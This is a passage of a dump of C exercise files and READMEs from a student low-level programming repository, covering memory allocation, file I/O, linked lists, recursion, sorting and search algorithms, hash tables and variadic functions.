"/0x0C-more_malloc_free/2-calloc.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * _calloc - allocates memory for an array of n elements of certain size.\n * @nmemb: number of elements to be allocated.\n * @size: size of elements.\n * Return: Pointer to allocated memory.\n */\nvoid *_calloc(unsigned int nmemb, unsigned int size)\n{\n\tchar *mem_as = NULL;\n\tunsigned int i;\n\n\tif (nmemb == 0 || size == 0)\n\t\treturn (NULL);\n\n\tmem_as = malloc(nmemb * size);\n\tif (mem_as == NULL)\n\t\treturn (NULL);\n\tfor (i = 0; i < (nmemb * size); i++)\n\t{\n\t\tmem_as[i] = 0;\n\t}\n\treturn (mem_as);\n}\n" }, { "alpha_fraction": 0.6390449404716492, "alphanum_fraction": 0.648876428604126, "avg_line_length": 19.941177368164062, "blob_id": "a209aa9b5f7b3415d4381a5711fb3b3453f7d8c8", "content_id": "c9e83e842f1cbc8dddb74cbb5a6be856945a8112", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 712, "license_type": "no_license", "max_line_length": 79, "num_lines": 34, "path": "/0x15-file_io/0-read_textfile.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * read_textfile - reads a text file and prints it to the POSIX stdout.\n * @filename: filename string.\n * @letters: number of letters it should read and print.\n * Return: he actual number of letters it could read and print or 0 if the file\n * can't be opened.\n */\n\nssize_t read_textfile(const char *filename, size_t letters)\n{\n\tint fd;\n\tint letter_co;\n\tchar *buf;\n\n\tif (filename == NULL)\n\t\treturn (0);\n\n\tfd = open(filename, O_RDONLY);\n\tif (fd == -1)\n\t\treturn (0);\n\tbuf = malloc(sizeof(char) * letters);\n\tif (buf == NULL)\n\t\treturn (0);\n\n\tletter_co = write(STDOUT_FILENO, buf, read(fd, buf, letters));\n\tif (letter_co == -1)\n\t\treturn (0);\n\n\tclose(fd);\n\tfree(buf);\n\treturn (letter_co);\n}\n" }, { "alpha_fraction": 0.6036745309829712, "alphanum_fraction": 0.6089239120483398, "avg_line_length": 14.875, "blob_id": "dcd7a7d599383c8b0a7c04b52c22ae97163e60ce", "content_id": "0974a0acf6c6fa6e38d0f5b34471fae398c7a0ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 381, "license_type": "no_license", "max_line_length": 68, "num_lines": 24, "path": "/0x13-more_singly_linked_lists/5-free_listint2.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * free_listint2 - frees a listint_t list and sets the head to NULL.\n * @head: pointer to first node.\n */\nvoid free_listint2(listint_t **head)\n{\n\tlistint_t *temp;\n\tlistint_t *cursor;\n\n\tif (head == NULL)\n\t\treturn;\n\n\tif (*head == NULL)\n\t\treturn;\n\ttemp = *head;\n\twhile (temp != NULL)\n\t{\n\t\tcursor = temp;\n\t\ttemp = temp->next;\n\t\tfree(cursor);\n\t}\n\t*head = NULL;\n}\n" }, { "alpha_fraction": 0.8399999737739563, "alphanum_fraction": 0.8399999737739563, "avg_line_length": 125, "blob_id": "b8d3638733b95006ba4d954535c16bb6e8d82128", "content_id": "3d071df4b713e53a45db8d8ab1b060d52912615c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 125, "license_type": "no_license", "max_line_length": 125, "num_lines": 1, "path": "/0x02-functions_nested_loops/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This is a repository with different C programs created for the purpose of studing prototype functions, loops and nested loops" }, { "alpha_fraction": 0.5475504398345947, "alphanum_fraction": 0.579250693321228, "avg_line_length": 17.263158798217773, "blob_id": "55602962bd0099d855c733b2b1745f5e60e81468", "content_id": "ba14362a951759fa71adc904a220c0ed6c51f274", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 694, "license_type": "no_license", "max_line_length": 77, "num_lines": 38, "path": "/0x13-more_singly_linked_lists/103-find_loop.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n\n/**\n * find_listint_loop - finds the loop in a linked list.\n * @head: pointer to first node.\n * Return: the node address where the loop starts or NULL if there is no loop\n */\nlistint_t *find_listint_loop(listint_t *head)\n{\n\tlistint_t *ptr1 = NULL;\n\tlistint_t *ptr2 = NULL;\n\n\tif (head == NULL)\n\t\treturn (NULL);\n\tptr1 = head;\n\tptr2 = head;\n\n\twhile (ptr1 && ptr2 && ptr2->next)\n\t{\n\t\tptr1 = ptr1->next;\n\t\tptr2 = ptr2->next->next;\n\n\t\tif (ptr1 == ptr2)\n\t\t{\n\t\t\twhile (1)\n\t\t\t{\n\t\t\t\tptr2 = ptr1;\n\t\t\t\twhile (ptr2->next != ptr1 && ptr2->next != head)\n\t\t\t\t\tptr2 = ptr2->next;\n\t\t\t\tif (ptr2->next == head)\n\t\t\t\t\tbreak;\n\t\t\t\thead = head->next;\n\t\t\t}\n\t\t\treturn (head);\n\t\t}\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.5775193572044373, "alphanum_fraction": 0.5949612259864807, "avg_line_length": 19.639999389648438, "blob_id": "bf050303e70d14f816464ffdfd5eb98597740a9d", "content_id": "d07e67602411fff314b9d364805efe9bcee12fb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 516, "license_type": "no_license", "max_line_length": 72, "num_lines": 25, "path": "/0x08-recursion/6-is_prime_number.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * calc_prime - returns the factorial of a given number.\n * @n: input value.\n * @y: number calc.\n * Return: 0 or 1.\n */\nint calc_prime(int n, int y)\n{\n\tif ((y * y) == n || n < 0)\n\t\treturn (0);\n\telse if ((y * y) > n)\n\t\treturn (1);\n\treturn (calc_prime(n, (y + 1)));\n}\n\n/**\n * is_prime_number - returns the factorial of a given number.\n * @n: input value.\n * Return: 1 if the input integer is a prime number, otherwise return 0.\n */\nint is_prime_number(int n)\n{\n\treturn (calc_prime(n, 0));\n}\n" }, { "alpha_fraction": 0.3108384311199188, "alphanum_fraction": 0.3353783190250397, "avg_line_length": 12.216216087341309, "blob_id": "5189c82aa908e8f75e625cb72258b5d7a09da03c", "content_id": "1853f6fed3d36a5da07b95e753aa196594cbd639", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 489, "license_type": "no_license", "max_line_length": 41, "num_lines": 37, "path": "/0x02-functions_nested_loops/8-24_hours.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * jack_bauer - prints the 24 hour clock.\n *\n *\n */\n\nvoid jack_bauer(void)\n{\n\tint x, y, z, w;\n\n\tfor (x = '0'; x <= '2'; x++)\n\t{\n\t\tfor (y = '0'; y <= '9'; y++)\n\t\t{\n\t\t\tfor (z = '0'; z <= '5'; z++)\n\t\t\t{\n\t\t\t\tfor (w = '0'; w <= '9'; w++)\n\t\t\t\t{\n\t\t\t\t\tif (!(x == '2' && y > '3'))\n\t\t\t\t\t{\n\t\t\t\t\t\t_putchar(x);\n\t\t\t\t\t\t_putchar(y);\n\t\t\t\t\t\t_putchar(':');\n\t\t\t\t\t\t_putchar(z);\n\t\t\t\t\t\t_putchar(w);\n\t\t\t\t\t\t_putchar('\\n');\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.5653979182243347, "alphanum_fraction": 0.5771626234054565, "avg_line_length": 19.35211181640625, "blob_id": "e40d0aa38d791c17f9721897b74e34e46817021f", "content_id": "84aec1bbf4863ae53966621beb320eb699c59e15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1445, "license_type": "no_license", "max_line_length": 74, "num_lines": 71, "path": "/0x1B-sorting_algorithms/102-counting_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * _calloc - allocates memory for an array of n elements of certain size.\n * @nmemb: number of elements to be allocated.\n * @size: size of elements.\n * Return: Pointer to allocated memory.\n */\nvoid *_calloc(unsigned int nmemb, unsigned int size)\n{\n\tchar *mem_as = NULL;\n\tunsigned int i;\n\n\tif (nmemb == 0 || size == 0)\n\t\treturn (NULL);\n\n\tmem_as = malloc(nmemb * size);\n\tif (mem_as == NULL)\n\t\treturn (NULL);\n\tfor (i = 0; i < (nmemb * size); i++)\n\t{\n\t\tmem_as[i] = 0;\n\t}\n\treturn (mem_as);\n}\n\n/**\n * counting_sort - sorts an array of integers in ascending order using the\n * Counting sort algorithm\n * @array: array of integers\n * @size: size of array\n */\nvoid counting_sort(int *array, size_t size)\n{\n\tint large = 0, j, idx, num;\n\tint *index_arr, *aux_arr;\n\tsize_t i;\n\n\tif (!array || size == 1)\n\t\treturn;\n\tfor (i = 0; i < size; i++)\n\t\tif (large < array[i])\n\t\t\tlarge = array[i];\n\tindex_arr = _calloc(large + 1, sizeof(int));\n\tfor (i = 0; i < size; i++)\n\t{\n\t\tidx = array[i];\n\t\tindex_arr[idx] += 1;\n\t}\n\tfor (j = 1; j <= large; j++)\n\t\tindex_arr[j] += index_arr[j - 1];\n\tprint_array(index_arr, large + 1);\n\taux_arr = malloc(size * sizeof(int));\n\tif (aux_arr == NULL)\n\t{\n\t\tfree(index_arr);\n\t\treturn;\n\t}\n\tfor (i = 0; i < size; i++)\n\t{\n\t\tnum = array[i];\n\t\tidx = index_arr[array[i]] - 1;\n\t\tindex_arr[array[i]] -= 1;\n\t\taux_arr[idx] = num;\n\t}\n\tfor (i = 0; i < size; i++)\n\t{\n\t\tarray[i] = aux_arr[i];\n\t}\n\tfree(index_arr);\n\tfree(aux_arr);\n}\n" }, { "alpha_fraction": 0.8072289228439331, "alphanum_fraction": 0.8072289228439331, "avg_line_length": 82, "blob_id": "e894c32a9a923bc51deb2300617391bc70451d8b", "content_id": "2341129c2baaa6faaa287974af0edad6978621a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 83, "license_type": "no_license", "max_line_length": 82, "num_lines": 1, "path": "/0x09-static_libraries/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository is about static and dynamic libraries, how to create and use them.\n" }, { "alpha_fraction": 0.5467255115509033, "alphanum_fraction": 0.5496688485145569, "avg_line_length": 13.612903594970703, "blob_id": "b9e0d95b496c3f6984eef5b7ba0429f52d50929e", "content_id": "645003c6c70f5193b839b226e0a3d54053865394", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1359, "license_type": "no_license", "max_line_length": 49, "num_lines": 93, "path": "/0x10-variadic_functions/3-print_all.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stdarg.h>\n#include <stdio.h>\n#include \"variadic_functions.h\"\n\n/**\n * print_all - function that prints anything.\n * @format: formats numbers given.\n */\n\nvoid print_all(const char * const format, ...)\n{\n\tprfor_t form_get[] = {\n\t\t{\"c\", print_char},\n\t\t{\"i\", print_integer},\n\t\t{\"f\", print_float},\n\t\t{\"s\", print_string},\n\t\t{NULL, NULL}\n\t};\n\tint i, j;\n\tva_list argu;\n\tchar *s = \"\";\n\n\tva_start(argu, format);\n\ti = 0;\n\n\twhile (format != NULL && format[i])\n\t{\n\t\tj = 0;\n\t\twhile (j < 4)\n\t\t{\n\t\t\tif (form_get[j].form[0] == format[i])\n\t\t\t{\n\t\t\t\tprintf(\"%s\", s);\n\t\t\t\t(form_get[j].f(argu));\n\t\t\t\ts = \", \";\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tj++;\n\t\t}\n\t\ti++;\n\t}\n\tprintf(\"\\n\");\n\tva_end(argu);\n}\n/**\n * print_char - function that prints characters.\n * @va: arguments.\n */\nvoid print_char(va_list va)\n{\n\tint c;\n\n\tc = va_arg(va, int);\n\tprintf(\"%c\", c);\n}\n/**\n * print_integer - function that prints integers.\n * @va: arguments.\n */\nvoid print_integer(va_list va)\n{\n\tint i;\n\n\ti = va_arg(va, int);\n\tprintf(\"%d\", i);\n}\n/**\n * print_float - function that prints floats.\n * @va: arguments.\n */\nvoid print_float(va_list va)\n{\n\tdouble f;\n\n\tf = va_arg(va, double);\n\tprintf(\"%f\", f);\n}\n/**\n * print_string - function that prints stings.\n * @va: arguments.\n */\nvoid print_string(va_list va)\n{\n\tchar *s;\n\n\ts = va_arg(va, char *);\n\tif (s == NULL)\n\t{\n\t\tprintf(\"(nil)\");\n\t\treturn;\n\t}\n\tprintf(\"%s\", s);\n}\n" }, { "alpha_fraction": 0.6462196707725525, "alphanum_fraction": 0.6476462483406067, "avg_line_length": 23.172412872314453, "blob_id": "38281340d4b061d33a1046edde2d38d7e0e2130e", "content_id": "b15065646bdabd21827f28401965f3db9cf837db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 703, "license_type": "no_license", "max_line_length": 74, "num_lines": 29, "path": "/0x1A-hash_tables/4-hash_table_get.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"hash_tables.h\"\n\n/**\n * hash_table_get - function that retrieves a value associated with a key.\n * @ht: hash table to look into.\n * @key: key value which is been looked.\n * Return: the value associated with the element, or NULL if key couldn’t\n * be found.\n */\n\nchar *hash_table_get(const hash_table_t *ht, const char *key)\n{\n\thash_node_t *cursor;\n\tunsigned long int index;\n\n\tif (ht == NULL || key == NULL)\n\t\treturn (NULL);\n\n\tindex = key_index((const unsigned char *)key, ht->size);\n\n\tif (ht->array[index] == NULL)\n\t\treturn (NULL);\n\tfor (cursor = ht->array[index]; cursor != NULL; cursor = cursor->next)\n\t{\n\t\tif (strcmp(key, cursor->key) == 0)\n\t\t\treturn (cursor->value);\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.5320512652397156, "alphanum_fraction": 0.5448718070983887, "avg_line_length": 15.714285850524902, "blob_id": "06becb9ce5e6d84890b0f51246fc2bca45f2a98d", "content_id": "b969bff0a021b01125217f6b492254a6fffb59db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 468, "license_type": "no_license", "max_line_length": 43, "num_lines": 28, "path": "/0x06-pointers_arrays_strings/0-strcat.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * _strcat - concatenate two strings\n * @dest: first string input to be changed.\n * @src: string to be added.\n * Return: pointer to the dest string.\n */\nchar *_strcat(char *dest, char *src)\n{\n\tint i = 0, j = 0;\n\n\t/*count first string*/\n\twhile (dest[i] != '\\0')\n\t{\n\t\ti++;\n\t}\n\t/*add second string to the first*/\n\twhile (src[j] != '\\0')\n\t{\n\t\tdest[i] = src[j];\n\t\ti++;\n\t\tj++;\n\t}\n\t/* add '\\0' at the end */\n\tdest[i] = '\\0';\n\treturn (&(*dest));\n}\n" }, { "alpha_fraction": 0.7684210538864136, "alphanum_fraction": 0.7684210538864136, "avg_line_length": 20.22222137451172, "blob_id": "2d074d8d9a1c436ece6e7f81ae1b80ee14f0044b", "content_id": "7acc5f340f9558e0b163ba6506646708592ed9b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 190, "license_type": "no_license", "max_line_length": 71, "num_lines": 9, "path": "/0x01-variables_if_else_while/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This project is about the if and else statements and the use of loops,\nwe will find diferent types of programns, also the use of operators and\nvariables.\n\nif\nif... else\nwhile\ndo... while\nfor" }, { "alpha_fraction": 0.5512820482254028, "alphanum_fraction": 0.5641025900840759, "avg_line_length": 13.625, "blob_id": "27c27e9c035e51c61b49523529b46a38cb371f18", "content_id": "ddc4eeb8ba612a46c6987e704274eb3977870844", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 234, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/0x04-more_functions_nested_loops/6-print_line.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_line - Prints the numbers to 14.\n * @n: variable to strore input value.\n */\n\nvoid print_line(int n)\n{\n\tchar a = '_', iter;\n\n\tfor (iter = 0; iter < n; iter++)\n\t{\n\t\t_putchar(a);\n\t}\n\t_putchar('\\n');\n}\n" }, { "alpha_fraction": 0.6955810189247131, "alphanum_fraction": 0.6955810189247131, "avg_line_length": 23.440000534057617, "blob_id": "43b6a56705fd998c25ef8fd3eb995fd116b06d53", "content_id": "a7c03e49ae9c025b599f96b412cc76f9f8b7407d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 611, "license_type": "no_license", "max_line_length": 69, "num_lines": 25, "path": "/0x10-variadic_functions/variadic_functions.h", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#ifndef VARIADIC_FUNCTIONS_H\n#define VARIADIC_FUNCTIONS_H\n#include <stdarg.h>\n\n/**\n * struct prfor - Struct prfor\n *\n * @form: The format type.\n * @f: The function associated.\n */\ntypedef struct prfor\n{\n\tchar *form;\n\tvoid (*f)(va_list);\n} prfor_t;\n\nint sum_them_all(const unsigned int n, ...);\nvoid print_numbers(const char *separator, const unsigned int n, ...);\nvoid print_strings(const char *separator, const unsigned int n, ...);\nvoid print_all(const char * const format, ...);\nvoid print_char(va_list va);\nvoid print_integer(va_list va);\nvoid print_float(va_list va);\nvoid print_string(va_list va);\n#endif\n" }, { "alpha_fraction": 0.807692289352417, "alphanum_fraction": 0.807692289352417, "avg_line_length": 38, "blob_id": "64b2e20edfe6b50122542760476e8e1af054c1a7", "content_id": "425949ef4035a8dc27c40dba510c3f7983a452e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 156, "license_type": "no_license", "max_line_length": 84, "num_lines": 4, "path": "/0x0E-structures_typedef/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository contain files for the project about learning Structures and Typedef.\n\nWhat are structures, when, why and how to use them\nHow to use typedef\n" }, { "alpha_fraction": 0.5801216959953308, "alphanum_fraction": 0.5851926803588867, "avg_line_length": 21.409090042114258, "blob_id": "d709fd8fbc624ace609c11defbf1391428fd6d4c", "content_id": "73907f7fac4a63a2938c164f38c87025faec06da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 986, "license_type": "no_license", "max_line_length": 77, "num_lines": 44, "path": "/0x13-more_singly_linked_lists/9-insert_nodeint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * insert_nodeint_at_index - inserts a new node at a given position.\n * @head: pointer to first node.\n * @idx: given node index.\n * @n: data to store in the new node.\n * Return: return the address of the new node, or NULL if it failed or\n * if it is not possible to add the new node at index idx.\n */\nlistint_t *insert_nodeint_at_index(listint_t **head, unsigned int idx, int n)\n{\n\tlistint_t *new;\n\tlistint_t *cursor;\n\tunsigned int i;\n\n\tif (head == NULL)\n\t\treturn (NULL);\n\tcursor = *head;\n\tif (idx == 0 || (idx == 0 && *head == NULL))\n\t{\n\t\tnew = malloc(sizeof(listint_t));\n\t\tif (new == NULL)\n\t\t\treturn (NULL);\n\t\tnew->n = n;\n\t\tnew->next = *head;\n\t\t*head = new;\n\t\treturn (new);\n\t}\n\tfor (i = 0; cursor != NULL; i++)\n\t{\n\t\tif (i == (idx - 1) && idx != 0)\n\t\t{\n\t\t\tnew = malloc(sizeof(listint_t));\n\t\t\tif (new == NULL)\n\t\t\t\treturn (NULL);\n\t\t\tnew->n = n;\n\t\t\tnew->next = cursor->next;\n\t\t\tcursor->next = new;\n\t\t\treturn (new);\n\t\t}\n\t\tcursor = cursor->next;\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.5387205481529236, "alphanum_fraction": 0.5471380352973938, "avg_line_length": 15.5, "blob_id": "658477aa4c540afea317d277d8cebbb90f9ed88a", "content_id": "2f528bee7dd08be2a9a11d83847e0b8d9e19cb40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 594, "license_type": "no_license", "max_line_length": 65, "num_lines": 36, "path": "/0x1B-sorting_algorithms/2-selection_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * selection_sort - sorting algorithm that sorts in selction form\n * @array: array to sort\n * @size: size of array\n * Return: Nothing\n */\nvoid selection_sort(int *array, size_t size)\n{\n\tsize_t j, cont = 0, pos;\n\tint aux, flag = 0, value;\n\n\twhile (cont < size)\n\t{\n\t\tpos = cont;\n\t\tvalue = array[cont];\n\t\tfor (j = cont; j < size; j++)\n\t\t{\n\t\t\tif (value > array[j])\n\t\t\t{\n\t\t\t\tflag = 1;\n\t\t\t\tvalue = array[j];\n\t\t\t\tpos = j;\n\t\t\t}\n\t\t}\n\t\tif (flag == 1)\n\t\t{\n\t\t\taux = array[cont];\n\t\t\tarray[cont] = value;\n\t\t\tarray[pos] = aux;\n\t\t\tprint_array(array, size);\n\t\t}\n\t\tcont++;\n\t\tflag = 0;\n\t}\n}\n" }, { "alpha_fraction": 0.5565410256385803, "alphanum_fraction": 0.567627489566803, "avg_line_length": 18.60869598388672, "blob_id": "aa632ef0a9a426cd36dd796e65d3884e1e37bb7f", "content_id": "93adb8c0a511f67431d487ed003db5e41b250810", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 902, "license_type": "no_license", "max_line_length": 73, "num_lines": 46, "path": "/0x17-doubly_linked_lists/8-delete_dnodeint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * delete_dnodeint_at_index - deletes the node at index of a linked list.\n * @head: pointer to first node.\n * @index: given node index.\n * Return: 1 if it succeeded or -1 if it failed.\n */\nint delete_dnodeint_at_index(dlistint_t **head, unsigned int index)\n{\n\tdlistint_t *temp;\n\tdlistint_t *cursor;\n\tunsigned int i;\n\n\tif (head == NULL)\n\t\treturn (-1);\n\tcursor = *head;\n\tfor (i = 0; cursor != NULL; i++, cursor = cursor->next)\n\t{\n\t\tif (index == 0)\n\t\t{\n\t\t\ttemp = *head;\n\t\t\t*head = temp->next;\n\t\t\tif (temp->next != NULL)\n\t\t\t\ttemp->next->prev = NULL;\n\t\t\tfree(temp);\n\t\t\treturn (1);\n\t\t}\n\t\tif (i == (index - 1))\n\t\t{\n\t\t\tif (cursor->next == NULL)\n\t\t\t\tbreak;\n\t\t\ttemp = cursor->next;\n\t\t\tif (temp->next == NULL)\n\t\t\t{\n\t\t\t\tcursor->next = NULL;\n\t\t\t\tfree(temp);\n\t\t\t\treturn (1);\n\t\t\t}\n\t\t\tcursor->next = temp->next;\n\t\t\ttemp->next->prev = cursor;\n\t\t\tfree(temp);\n\t\t\treturn (1);\n\t\t}\n\t}\n\treturn (-1);\n}\n" }, { "alpha_fraction": 0.5066666603088379, "alphanum_fraction": 0.5360000133514404, "avg_line_length": 12.392857551574707, "blob_id": "080194fdc77eb73e8efd399ec6fca985953a5bdd", "content_id": "e888e587f1b71a88738f9b6ad9bd268eea88a70d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 375, "license_type": "no_license", "max_line_length": 39, "num_lines": 28, "path": "/0x05-pointers_arrays_strings/101-keygen.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n/**\n * main - generation of password.\n *\n *\n * Return: always 0.\n */\n\nint main(void)\n{\n\tint num = 2772, var = 0, sum = 0, ran;\n\n\ttime_t t;\n\n\tsrand((unsigned) time(&t));\n\n\twhile (var < num)\n\t{\n\t\tran = rand() % 128;\n\t\tvar = var + ran;\n\t\tprintf(\"%c\", ran);\n\t\tsum = sum + ran;\n\t}\n\tprintf(\"%c\", (num - sum));\n\treturn(0);\n}\n" }, { "alpha_fraction": 0.6265860795974731, "alphanum_fraction": 0.6308156847953796, "avg_line_length": 18.702381134033203, "blob_id": "34693cf60eba1d4099d02ef3245cf82314617b50", "content_id": "8001f533811caf3aacba08cb6ec1a2114d40492d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1655, "license_type": "no_license", "max_line_length": 78, "num_lines": 84, "path": "/0x1B-sorting_algorithms/107-quick_sort_hoare.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n\n/**\n * swap - change position between two position of an array and print the array\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n */\nvoid swap(int *array, int first, int last, size_t size)\n{\n\tint aux, value;\n\n\tvalue = array[first];\n\taux = array[last];\n\tarray[last] = value;\n\tarray[first] = aux;\n\tprint_array(array, size);\n}\n/**\n * part_hoare - fin the partition position or pivot of the array\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n * Return: pivot index\n */\nint part_hoare(int *array, int first, int last, size_t size)\n{\n\tint pivot = array[last];\n\tint i = first - 1;\n\tint j = last + 1;\n\n\twhile (1)\n\t{\n\t\tdo {\n\t\t\ti++;\n\t\t} while (array[i] < pivot);\n\n\t\tdo {\n\t\t\tj--;\n\t\t} while (array[j] > pivot);\n\n\t\tif (i > j)\n\t\t\treturn (j);\n\t\tif (array[i] > array[j])\n\t\t\tswap(array, i, j, size);\n\t}\n}\n\n/**\n * sorting_hoare - sorts an array of integers in ascending order\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n */\nvoid sorting_hoare(int *array, int first, int last, size_t size)\n{\n\tint pivot;\n\n\tif (first < last)\n\t{\n\t\tpivot = part_hoare(array, first, last, size);\n\t\tsorting_hoare(array, first, pivot, size);\n\t\tsorting_hoare(array, pivot + 1, last, size);\n\t}\n}\n\n/**\n * quick_sort_hoare - sorts an array of integers in ascending order using the\n * Quick sort algorithm\n * @array: array to sort\n * @size: size of array\n */\nvoid quick_sort_hoare(int *array, size_t size)\n{\n\tint last = size - 1;\n\n\tif (!array || size < 2)\n\t\treturn;\n\n\tsorting_hoare(array, 0, last, size);\n}\n" }, { "alpha_fraction": 0.617977499961853, "alphanum_fraction": 0.617977499961853, "avg_line_length": 11.714285850524902, "blob_id": "802600a63d988a74e0483d3c8fca67574b7dee07", "content_id": "7c5f2a3d3a6102465227f799846ec254466a844a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 89, "license_type": "no_license", "max_line_length": 28, "num_lines": 7, "path": "/0x0D-preprocessor/101-preprocessor_abuse.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#define s \"Hello, Holberton\"\n\nvoid main(void)\n{\n\tprintf(\"%s\\n\", s);\n}\n" }, { "alpha_fraction": 0.607594907283783, "alphanum_fraction": 0.6103073954582214, "avg_line_length": 27, "blob_id": "05ad300e0771ac030b0b2f30668e7214fcd1fd9e", "content_id": "ccbd599dcb2806ebc1a782dcb548bfab18b6f32b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2212, "license_type": "no_license", "max_line_length": 79, "num_lines": 79, "path": "/0x1E-search_algorithms/105-jump_list.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"search_algos.h\"\n#include <math.h>\n\n/**\n * linear_mod - function that searches for a value in an linked list\n * using the Linear search algorithm\n * @start_n: a pointer to the first node\n * @start: initial index\n * @end: final index\n * @value: is the value to search for\n * Return: pointer to the first node where value is located or NULL if value\n * is not present in head or if head is NULL.\n */\n\nlistint_t *linear_mod(listint_t *start_n, size_t start, size_t end, int value)\n{\n\tsize_t i;\n\n\tif (start_n == NULL)\n\t\treturn (NULL);\n\n\tfor (i = start; i <= end; i++, start_n = start_n->next)\n\t{\n\t\tprintf(\"Value checked at index [%d] = [%d]\\n\", (int) i, start_n->n);\n\t\tif (start_n->n == value)\n\t\t\treturn (start_n);\n\t}\n\treturn (NULL);\n}\n\n/**\n * jump_list - function that searches for a value in a sorted list of\n * integers using the Jump search algorithm.\n * @list: pointer to the head of the list to search in\n * @size: the number of nodes in list\n * @value: is the value to search for\n * Return: pointer to the first node where value is located or NULL if value\n * is not present in head or if head is NULL.\n */\nlistint_t *jump_list(listint_t *list, size_t size, int value)\n{\n\tsize_t start, end, block_s;\n\tlistint_t *end_n, *start_n;\n\n\tblock_s = sqrt(size);\n\n\tif (list == NULL)\n\t\treturn (NULL);\n\n\tfor (end_n = list, start_n = list; end_n->index != block_s;\n\t end_n = end_n->next)\n\t\t;\n\tfor (start = 0, end = block_s; end < size && end_n->next;)\n\t{\n\t\tprintf(\"Value checked at index [%d] = [%d]\\n\", (int) end, end_n->n);\n\t\tif (start_n->n > value && start == 0)\n\t\t\treturn (NULL);\n\t\telse if (end_n->n >= value)\n\t\t\tbreak;\n\t\tfor (end += block_s; end_n->index != end && end_n->next; end_n = end_n->next)\n\t\t{\n\t\t\tstart_n = start_n->next;\n\t\t\tstart = end - block_s;\n\t\t}\n\t}\n\n\tif (end >= size - 